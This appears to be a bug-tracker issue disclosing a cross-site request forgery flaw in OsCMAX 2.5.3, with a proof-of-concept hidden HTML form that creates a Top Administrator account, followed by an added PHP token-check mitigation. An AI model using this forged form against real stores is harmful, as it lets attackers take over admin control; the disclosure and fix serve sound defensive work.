Details

    • Type: minor
    • Status: In Progress
    • Resolution: Unresolved
    • Affects versions: v2.5.3
    • Fix versions: None
    • Components: Security Issue
    • Labels: None
    • Severity: Major

    Description

    Hello,
    OsCMAX 2.5.3 suffers from a cross-site request forgery which allows the attacker to add a user.
    CWE-352

      <html>
      <form method="post" name="newmember" action="http://127.0.0.1/catalog/admin/admin_members.php?action=member_new&page=1&mID=1">
      <input type="hidden" name="admin_username" value="THETUNISIAN"/>
      <input type="hidden" name="admin_firstname" value="Moot3x"/>
      <input type="hidden" name="admin_lastname" value="Saad3x"/>
      <input type="hidden" name="admin_email_address" value="g4k@hotmail.esxxx"/>
      <input type="hidden" name="admin_groups_id" value="1"/>
      <!-- About "admin_groups_id" -->
      <!-- 1= Top Administrator -->
      <!-- 2= Customer Service  -->
      <input type='submit' name='Submit4' value="Agregar">
      </form>
      </html>
      

      The attacker can send a link to the admin, so an admin user will be created.
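A server-side mitigation for the forged form shown above, added here as an example and not taken from OsCMAX's own code: a synchronizer token issued once per admin session, echoed back by the legitimate form, and verified with hash_equals() before the member_new action writes anything. The function names csrf_token() and csrf_valid(), the field name csrf_token, and the trimmed form below are assumptions for illustration.

```php
<?php
// Added example (not OsCMAX code): synchronizer-token CSRF check for an
// admin "new member" handler such as admin_members.php?action=member_new.
session_start();

// Issue one unpredictable token per session. Only pages served from this
// origin can read it, so a cross-site form cannot include it.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted token matches the session token.
// hash_equals() compares in constant time to avoid timing leaks.
function csrf_valid(array $post): bool {
    $expected = $_SESSION['csrf_token'] ?? '';
    $given    = $post['csrf_token']   ?? '';
    return $expected !== ''
        && is_string($given)
        && hash_equals($expected, $given);
}

// The forged request from the report carries no token, so it stops here
// before any member row is created; the rejection is logged for detection.
if ($_SERVER['REQUEST_METHOD'] === 'POST'
    && ($_GET['action'] ?? '') === 'member_new') {
    if (!csrf_valid($_POST)) {
        http_response_code(403);
        error_log('CSRF token mismatch on member_new from '
            . ($_SERVER['REMOTE_ADDR'] ?? 'unknown'));
        exit('Invalid request token.');
    }
    // Original member-creation logic belongs here (omitted in this example).
}

// The legitimate admin form embeds the token as a hidden field.
$token = htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8');
?>
<form method="post" name="newmember"
      action="admin_members.php?action=member_new&amp;page=1">
  <input type="hidden" name="csrf_token" value="<?= $token ?>">
  <input type="text" name="admin_username">
  <input type="text" name="admin_firstname">
  <input type="text" name="admin_lastname">
  <input type="text" name="admin_email_address">
  <input type="hidden" name="admin_groups_id" value="2">
  <input type="submit" name="Submit4" value="Add">
</form>
```

Setting the session cookie with the SameSite attribute adds a second, browser-enforced layer, but the token check is what rejects the forged submission regardless of browser support.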


    People

    • Assignee: michael_s Michael Sasek
    • Reporter: tcyber g4k
